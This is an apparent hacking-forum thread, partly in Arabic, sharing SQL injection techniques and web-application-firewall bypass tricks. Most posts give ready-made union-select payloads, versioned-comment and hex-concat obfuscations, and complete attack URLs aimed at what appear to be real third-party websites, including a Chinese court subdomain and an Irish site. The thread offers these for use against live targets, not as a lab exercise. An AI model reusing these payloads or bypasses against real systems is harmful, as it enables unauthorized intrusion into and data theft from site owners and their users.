sql Injection Professional & many WAF Bypassing TRK

[CODE3]

بعض المشاكل في الحقن وكيف تخطيها

:: like ::

http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ version() --+

open source page : press Ctrl+f and typ 5.0

and to avoid Source Code Injection and appear info inside img in mean page

use

concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

or

concat(0x273e27,version(),0x3c212d2d)

http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+

​

 

[CODE3]

رد: sql Injection Professional & many WAF Bypassing TRK

(2)

jumble.dibbaa.com/article.php?id=7' union select 1,2,3,4,5,6,7,8 +--+

\

no column appear in page i will use div+0 i will put it befor union select

or use one of this

div+0
Having+1=0
AND+1=0
/*!and*/+1=0
and(1)=(0) x

OR false the url query

id=-1 union all select
id=null union all select
id=1+and+false+union+all+select
id=9999 union all select

jumble.dibbaa.com/article.php?id=7' div 0 union select 1,2,3,4,5,6,7,8 +--+

:icon30::icon30:
​

 

[CODE3]

رد: sql Injection Professional & many WAF Bypassing TRK

http://www.phm.ie/project.php?cat=Conservation

u can use many method to bypassing Forbidden

like

+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

http://www.phm.ie/project.php?cat=Conservation' +and(1)=(0) +union+distinct+select+ 1,version(),3,4,5,6,7,8,9,10-- -

and use and 1=0 to apear column nmb in the page

or

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)
​

 

[ABO-SAGER]

رد: sql Injection Professional & many WAF Bypassing TRK

شكراً لك بس انا وضعت شرح كيف تتخطى الحقن في السورس